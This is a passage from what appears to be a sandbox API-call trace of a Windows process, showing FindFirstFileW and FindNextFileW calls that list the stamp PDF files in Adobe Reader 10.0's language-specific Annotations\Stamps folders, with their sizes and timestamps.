ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc084, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pointers.pdf", cAlternateFileName="")) returned 1 [0058.704] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8c96, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.704] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2eb9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Standard.pdf", cAlternateFileName="")) returned 1 [0058.705] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9a88d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.705] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81eb2980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9a88d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.705] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.706] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7feb61e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FRA", cAlternateFileName="")) returned 1 [0058.706] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7feb61e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.707] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7feb61e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7feb61e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.707] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x30eb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.708] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9d75, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.708] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x44925, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.708] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x44925, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.708] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.708] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8070aee0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HRV", cAlternateFileName="")) returned 1 [0058.708] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8070aee0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.711] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8070aee0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8070aee0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.711] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x21a02, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.711] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x80f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Faces.pdf", cAlternateFileName="")) returned 1 [0058.711] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pointers.pdf", cAlternateFileName="")) returned 1 [0058.711] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb6cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.712] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c4f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Standard.pdf", cAlternateFileName="")) returned 1 [0058.712] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1b7c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.712] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8070aee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1b7c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.712] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.713] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806e4d80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x806e4d80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HUN", cAlternateFileName="")) returned 1 [0058.713] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806e4d80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x806e4d80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.716] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806e4d80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x806e4d80, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.716] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xbb3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.716] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x80f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Faces.pdf", cAlternateFileName="")) returned 1 [0058.716] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pointers.pdf", cAlternateFileName="")) returned 1 [0058.717] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x9083, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.717] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c4f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Standard.pdf", cAlternateFileName="")) returned 1 [0058.717] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b14, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.717] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x806e4d80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b14, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.717] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.718] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITA", cAlternateFileName="")) returned 1 [0058.718] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.719] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fedc340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7fedc340, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.719] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xca88, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.720] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8ff9, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.720] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18575, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.720] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fedc340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x18575, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 0 [0058.720] FindClose (in: hFindFile=0x6a0320 | out: hFindFile=0x6a0320) returned 1 [0058.720] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPN", cAlternateFileName="")) returned 1 [0058.720] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\*.*", lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6a0320 [0058.721] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ff024a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ff024a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.721] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xcc2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dynamic.pdf", cAlternateFileName="")) returned 1 [0058.721] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xffc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hanko.pdf", cAlternateFileName="")) returned 1 [0058.721] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa447, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignHere.pdf", cAlternateFileName="")) returned 1 [0058.721] FindNextFileW (in: hFindFile=0x6a0320, lpFindFileData=0x18e174 | out: lpFindFileData=0x18e174*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ff024a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c005, dwReserved0=0x0, dwReserved1=0x0, cFileName="StandardBusiness.pdf", cAlternateFileName="STANDA~1.PDF")) returned 1 [0058.721] 